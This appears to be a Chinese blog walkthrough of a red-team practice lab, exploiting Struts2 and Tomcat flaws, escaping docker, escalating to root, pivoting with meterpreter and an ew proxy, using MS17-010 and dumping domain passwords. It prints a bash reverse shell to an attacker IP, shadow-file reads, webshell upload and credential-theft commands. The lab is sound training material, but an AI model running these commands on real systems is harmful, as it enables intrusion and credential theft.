红队打靶,红日靶场系列,红日靶场4

文章目录

  • 环境搭建:
  • 外网渗透:
    • Struts2
    • phpmyadmin
    • tomcat
  • 内网渗透
    • msf上线
    • 建立代理
    • 内网信息收集
    • 密码获取
    • 总结


环境搭建:

红队打靶,红日靶场系列,红日靶场4_第1张图片

攻击机:
真实机win10
kali : 192.168.0.128
靶机:
web:192.168.183.130, 192.168.0.129
dc: 192.168.183.129
win7:192.168.183.128
启动docker环境,输入sudo后提示输入密码,输入ubuntu即可

cd /home/ubuntu/Desktop/vulhub/struts2/s2-045
sudo docker-compose up -d
cd /home/ubuntu/Desktop/vulhub/tomcat/CVE-2017-12615/
sudo docker-compose up -d
cd /home/ubuntu/Desktop/vulhub/phpmyadmin/CVE-2018-12613/
sudo docker-compose up -d

外网渗透:

先用RG来个端口扫描,探测到几个端口和三个服务,phpmyadmin,tomcat,struts2
红队打靶,红日靶场系列,红日靶场4_第2张图片

Struts2

访问2001端口可以看到个struts2的文件上传页面,直接上工具扫一下看看是否存在漏洞,发现一大堆

红队打靶,红日靶场系列,红日靶场4_第3张图片
点击执行命令,查询系统进程的cgroup信息,看看目标是否是docker环境
红队打靶,红日靶场系列,红日靶场4_第4张图片
很明显目标由docker搭建,看看是否可以进行docker逃逸
在kali中开启一个监听
在这里插入图片描述

在struts2内执行反弹shell的命令 bash -i &>/dev/tcp/192.168.0.128/8888 <&1
红队打靶,红日靶场系列,红日靶场4_第5张图片
kali成功接收shell
红队打靶,红日靶场系列,红日靶场4_第6张图片
docker逃逸
这里出不去,看下个端口

参考这篇文章:https://xz.aliyun.com/t/12495

phpmyadmin

phpmyadmin提权可以参考红日1

https://editor.csdn.net/md/?articleId=131577749

tomcat

扫一下,发现存在一个CVE-2017-12615具体可以一下这篇文章:tomcat系列漏洞复现
在这里插入图片描述
使用put方法写入一个webshell
红队打靶,红日靶场系列,红日靶场4_第7张图片
冰蝎连接
红队打靶,红日靶场系列,红日靶场4_第8张图片
命令执行,发现可以挂载光盘
红队打靶,红日靶场系列,红日靶场4_第9张图片
将真实机挂在到docker里面

mkdir /test
mount /dev/sda1 /test
cd /test
ls -al

可以看到真实机的一些东西
红队打靶,红日靶场系列,红日靶场4_第10张图片
执行下面命令可以看到所有用户的密码信息

cat /etc/passwd
cat /etc/shadow

这里可以在相同版本的ubuntu中进行创建用户密码,覆盖现有的密码,之后进行ssh连接,看不到密码信息的用哥斯拉连接
红队打靶,红日靶场系列,红日靶场4_第11张图片
连接ssh后进行提权
在这里插入图片描述
root 下面添加一个当前登录的用户,权限写成和root一样
红队打靶,红日靶场系列,红日靶场4_第12张图片
权限变成了root
在这里插入图片描述

内网渗透

msf上线

拿到主机权限之后发现有两块网卡,183网段使用kali无法通信,肯定为内网地址
红队打靶,红日靶场系列,红日靶场4_第13张图片
使用kali生成后门,并用xshell上传到ubuntu
红队打靶,红日靶场系列,红日靶场4_第14张图片
并赋予执行权限
红队打靶,红日靶场系列,红日靶场4_第15张图片
打开msf,配置、监听、执行

use exploit/multi/handler  #使用监听模块
set payload linux/x64/meterpreter/reverse_tcp #使用和木马相同的payload
set lhost 192.168.0.128 #kaili 的ip
set lport 4444 #木马的端口
run #执行

上线成功
红队打靶,红日靶场系列,红日靶场4_第16张图片

建立代理

在msf里添加路由

run post/multi/manage/autoroute

红队打靶,红日靶场系列,红日靶场4_第17张图片
这里用到一款工具,建立代理的话比较方便

https://github.com/idlefire/ew

在kali上执行命令

./ew_for_linux64 -s rcsocks -l 1080 -e 1234

红队打靶,红日靶场系列,红日靶场4_第18张图片

在目标主机上上传ew_for_linux64,执行命令

./ew_for_linux64 -s rssocks -d 192.168.48.136 -e 1234

在这里插入图片描述
创建成功
红队打靶,红日靶场系列,红日靶场4_第19张图片
用kali ping一下内网,看看代理是否创建成功
红队打靶,红日靶场系列,红日靶场4_第20张图片

内网信息收集

可以看到kali成功打入内网,使用msf模块进行内网主机探测

use auxiliary/scanner/discovery/udp_probe
set RHOSTS 192.168.183.0/24
set THREADS 15
run

发现两台主机
红队打靶,红日靶场系列,红日靶场4_第21张图片
红队打靶,红日靶场系列,红日靶场4_第22张图片
使用nmap扫一下,发现445端口都开着,试一下ms17010
红队打靶,红日靶场系列,红日靶场4_第23张图片
你妹的,坑死了,这里利用ms17010攻击的时候要把火绒退了,不然会拦截,这里成功拿下win7
红队打靶,红日靶场系列,红日靶场4_第24张图片
server的话可以攻击成功,但是创建不了会话
解决Kali中MSF Console拿到Windows shell后显示中文乱码问题,在拿到的Windows shell中输入如下命令,设置活动代码页字符为UTF-8编码。

chcp 65001

红队打靶,红日靶场系列,红日靶场4_第25张图片

密码获取

提权:使用meterpreter里面使用令牌窃取SYSTEM权限之后再进行mimikatz密码进行抓取

use incognito
impersonate_token "NT AUTHORITY\SYSTEM"

红队打靶,红日靶场系列,红日靶场4_第26张图片
成功获取win7在域里的明文密码
红队打靶,红日靶场系列,红日靶场4_第27张图片
红队打靶,红日靶场系列,红日靶场4_第28张图片

总结

有些过程思路很清晰,但是做起来各种问题,总结:还是带练
红队打靶,红日靶场系列,红日靶场4_第29张图片

你可能感兴趣的:(红队打靶,网络安全,web安全,安全)